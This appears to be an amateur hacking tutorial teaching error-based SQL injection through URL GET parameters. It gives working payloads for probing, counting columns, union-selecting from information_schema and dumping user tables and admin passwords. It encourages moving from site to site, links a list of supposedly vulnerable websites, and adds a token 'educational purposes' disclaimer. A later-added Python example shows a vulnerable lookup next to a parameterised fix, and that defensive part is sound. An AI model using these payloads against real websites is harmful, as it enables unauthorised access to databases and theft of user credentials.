
SQL INJECTION art of hacking website


Some introduction about SQL injection
Generally there are several ways to hack a website, and one of them is SQL injection. It is nothing more than getting the website to run simple SQL queries. But how? For that we need to know how the web page behaves. This kind of attack works at the application layer, i.e. against the web page itself, and it can be used to read or dump the database and also to delete data from it. There are several kinds of SQL injection methods. According to how the web page takes its input, they are generally divided into two types, GET method based and POST method based. Each is divided further: for the GET method there are some 10 types so far, and for the POST method there may be the same number or more.

Here I will show you how to dump data from the database with the GET method.

SQL injection with the GET method, based on errors (the error may be of any kind):

So let's start.

1) First check for the vulnerability. This is the main and most tedious task; if you are able to find the vulnerability then you can achieve your goal. To find vulnerabilities, give some junk input at the end of the URL; if the page produces an error, the page is vulnerable.

Ex: www.website.com/help.php?id=1\   (in this example I put \ as the junk input; you can also put " or ' or anything else)

2) Then find the number of columns with the "order by" command followed by a number (ex:-www.website.com/?id=49 order by 1-), and so on for the number of columns until we get an error message.

3) Now find the most vulnerable column by using "union select all" with all the column numbers. (ex:-www.website.com/?id=49 union select all 1,2,3...-)

If this displays an error or a blank page then move to the next site, or
if it displays a couple of numbers on the page, congrats, the site is vulnerable.

4) Now we need to find the tables.


a.) As the table names always lie in information_schema.tables, perform the query:

(ex:-www.website.com/?id=49 union select all 1,2,3...  table_name from information_schema.tables where table_schema=database())

b.) Now the most vulnerable column is "n", so we put table_name in place of "n".

c.) It will only show the first table name, the one lying at the top of the database. To show all the tables, the "group_concat(table_name)" function is used.

d.) (ex:-www.website.com/?id=49 union select all 1,2,3...  group_concat(table_name) from information_schema.tables where table_schema=database()).

e.) We got a number of tables: 'user' or 'username', 'docs', etc.

5) Now we need to find the columns of the desired table. Here it is 'user'.

a.) The input string needs to be converted into its decimal/ASCII equivalent in order to communicate with the database.

b.) You may use online help or any converter to convert any string to its decimal/ASCII equivalent.

c.) With 'user' as input the ASCII value is something like 12 34 99 22.. and so on.

d.) (ex:-www.website.com/?id=49 union select all 1,2,3...  column_name from information_schema.columns where table_name=char(12 34 99 22..))

e.) "group_concat" is used to show all the columns, and since we are concerned with columns, "information_schema.columns" is used instead of "information_schema.tables".

f.) Here we got 'id,user' as the columns of table 'user'.

g.) In order to retrieve the data, replace group_concat(column_name) with group_concat(id,0x3a,username) from username. "0x3a" is just the colon, and it will separate the contents which we retrieve.
(ex:-www.website.com/?id=49 union select all 1,2,3...  group_concat(id,0x3a,username) from user)

* So all the id, name and username values appear on the screen. Similarly, if you get the admin table and find columns admin_name and password, then you have to use the query "group_concat(admin_name,0x3a,password) from admin"; here admin_name and password are the columns and admin is the table name.
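
Why the probes in steps 1 to 3 get a reaction from the page, and the fix, as an added example that is not part of the original tutorial: a lookup that pastes the id parameter into the SQL text, next to one that validates it and binds it as a parameter. Python with an in-memory SQLite database stands in for the site's stack here, and the tables, rows and function names are constructed for the demo.

```python
import re
import sqlite3

def make_db():
    """Constructed in-memory data standing in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE help (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT);
        INSERT INTO help VALUES (1, 'Getting started'), (49, 'Contact');
        INSERT INTO user VALUES (1, 'alice'), (2, 'bob');
    """)
    return db

def lookup_vulnerable(db, raw_id):
    # Vulnerable: the id GET parameter is pasted into the SQL text, so
    # anything after the number is parsed as part of the statement.
    return db.execute("SELECT id, title FROM help WHERE id = " + raw_id).fetchall()

def lookup_hardened(db, raw_id):
    # Hardened: accept only a short run of ASCII digits, then bind the value
    # as a parameter so it can never change the shape of the statement.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be an integer")
    return db.execute("SELECT id, title FROM help WHERE id = ?", (int(raw_id),)).fetchall()

def handle(lookup, db, raw_id):
    """Return (outcome, rows) as the page handler would see them."""
    try:
        return "ok", lookup(db, raw_id)
    except ValueError:
        return "rejected", []      # answer with a generic 400
    except sqlite3.Error:
        return "sql-error", []     # log server-side, never echo to the client

# The probe shapes from steps 1-3, aimed at the constructed tables above.
PROBES = ["1'", "49 order by 3", "49 union select all id, username from user"]

if __name__ == "__main__":
    db = make_db()
    for probe in PROBES + ["49"]:
        print(repr(probe), handle(lookup_vulnerable, db, probe),
              handle(lookup_hardened, db, probe))
```

With the hardened lookup every probe ends as "rejected" before any SQL runs, while a plain id such as 49 still returns its row.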


This is only one kind of SQL injection attack; the remaining ones we will discuss in our next tutorial. Until then use this tutorial for learning. For getting SQL-vulnerable websites go to http://pastebin.com/GM9ZCg6A






enjoy

All of the above tutorial is for educational purposes, not for any bad activity. If anyone uses it for bad activity, this tutorial is not responsible for that.